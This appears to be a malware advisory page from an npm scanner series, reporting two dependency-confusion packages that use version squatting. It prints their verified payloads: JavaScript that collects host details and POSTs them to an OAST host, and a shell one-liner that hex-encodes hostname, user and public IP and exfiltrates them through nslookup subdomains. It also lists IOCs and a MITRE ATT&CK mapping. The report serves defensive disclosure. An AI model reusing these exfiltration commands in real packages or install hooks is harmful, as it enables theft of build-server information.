#011High2026-04-03

Dependency Confusion with DNS Exfiltration

coviu-client@9.9.9 + @client-web-next/ui@9.999.3

Informe Completo
Veredicto:MALICIOUS — Active dependency confusion with DNS exfil

Visión General

Two active dependency confusion attacks targeting internal corporate packages. coviu-client@9.9.9 uses classic HTTP POST to an OAST endpoint with system info. @client-web-next/ui@9.999.3 uses a more sophisticated DNS exfiltration technique — it converts system info to hex and sends it via nslookup subdomains, effectively bypassing HTTP-blocking firewalls. Both use version squatting (9.9.9, 9.999.3) to override internal package resolution.

2
Packages
DNS
Exfil Method
9.999
Version Squat
Corp
Target Type

Flujo del Ataque

Version Squatting
Both packages use inflated version numbers (9.9.9, 9.999.3) to win npm version resolution over legitimate internal packages.
HTTP Exfiltration
coviu-client collects hostname, username, platform, cwd, and node version. POSTs to kyvwaxnnaeqspwsjdgbphlrf5t5wwfi60.oast.fun/coviu-poc.
DNS Exfiltration
@client-web-next/ui converts system info to hex via xxd -p, then sends via nslookup $hex.d77sgkar47ngfv2rgnggn356sog1qsaji.oast.live — bypasses HTTP firewalls.
IP Leak
Also calls curl https://ifconfig.me to leak the build server's public IP address.

MITRE ATT&CK Mapeo

T1195.002Supply Chain Compromise — dependency confusion
T1059.007JavaScript Execution — preinstall hook
T1048.003Exfiltration Over Alternative Protocol — DNS exfiltration
T1592Gather Victim Host Information — hostname/user/IP recon

Tags

Dependency ConfusionDNS ExfiltrationVersion SquattingOASTCorporate

Informe Completo

Dependency Confusion: coviu-client + @client-web-next/ui

TL;DR

Two active dependency confusion attacks targeting internal corporate packages. One uses classic HTTP exfiltration, the other uses DNS exfiltration to bypass firewalls.

Package 1: coviu-client@9.9.9

  • Maintainer: m0hamedtayel (m.tayel2004@gmail.com)
  • Version: 9.9.9 (version squatting)
  • Description: "PoC - dependency confusion"
  • Published: 2026-04-03T14:11 UTC

Payload (verified)

const data = JSON.stringify({
  hostname: os.hostname(),
  username: os.userInfo().username,
  platform: os.platform(),
  whoami: process.env.USER || process.env.USERNAME || 'unknown',
  cwd: process.cwd(),
  node: process.version,
});
// POST to kyvwaxnnaeqspwsjdgbphlrf5t5wwfi60.oast.fun/coviu-poc

IOC

  • kyvwaxnnaeqspwsjdgbphlrf5t5wwfi60.oast.fun

Package 2: @client-web-next/ui@9.999.3

  • Maintainer: papadope (xristos8170@gmail.com)
  • Version: 9.999.3 (version squatting)
  • Description: "Security research - dependency confusion PoC"

Payload (verified)

exec("a=$(hostname;pwd;whoami;echo 'client-web-next-ui';curl https://ifconfig.me) && echo $a | xxd -p | head | while read ut;do nslookup $ut.d77sgkar47ngfv2rgnggn356sog1qsaji.oast.live;done")

DNS exfiltration — converts system info to hex, sends via nslookup subdomains. Bypasses HTTP-blocking firewalls.

IOC

  • d77sgkar47ngfv2rgnggn356sog1qsaji.oast.live
  • ifconfig.me (IP leak)

Credits

Detected by: npm-sentinel automated scanner Verified by: manual code review Date: 2026-04-03

Anterior
#010 34MB Obfuscated Agent Framework with Anti-Debug
Siguiente
#012 Silent Code Exfiltration + Remote Prompt Injection via Dev Tool Hooks